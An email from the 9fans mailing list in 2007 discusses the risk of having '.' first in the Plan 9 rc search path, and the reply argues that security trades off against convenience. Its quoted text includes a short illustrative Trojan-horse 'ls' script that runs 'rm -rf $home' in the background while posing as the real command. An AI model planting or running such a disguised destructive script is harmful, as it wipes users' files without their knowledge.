From mboxrd@z Thu Jan 1 00:00:00 1970 Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: References: <61172513-6773-4AA3-8EF0-182BD91D948B@mac.com> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <89A9D7D0-0B4A-4CBB-871E-77884D11A241@ar.aichi-u.ac.jp> Content-Transfer-Encoding: 7bit From: arisawa@ar.aichi-u.ac.jp Subject: Re: [9fans] security Date: Sat, 27 Oct 2007 19:04:20 +0900 To: Fans of the OS Plan 9 from Bell Labs <9fans@cse.psu.edu> Topicbox-Message-UUID: db589f92-ead2-11e9-9d60-3106f5b1d025 Hello, Removing files is not worth doing. The victim will immediately find what happened and will recover his files and then will consider what made the trouble. I don't say (. /bin) is safe in untrusted environment. Someone might steal my private info using some trick. Security is tradeoff with convenience. I guess we (member of 9fans) are happy enough working in trusted environment. Kenji Arisawa On 2007/10/27, at 18:03, roger peppe wrote: >>> 1) rc: the value of $path is (. /bin). It is a classic case not to >>> have . as the first directory when searching for programs - it >>> allows >>> Trojan horses to form. >> >> if you're the only one using your system, how could this be a >> problem? > > to be fair, if i'd put a file in /n/sources/contrib/rog/ls: > > #!/bin/rc > rm -rf $home & > ls $* |* | grep -v ls > > then i'm sure there'd be one or two unhappy people around...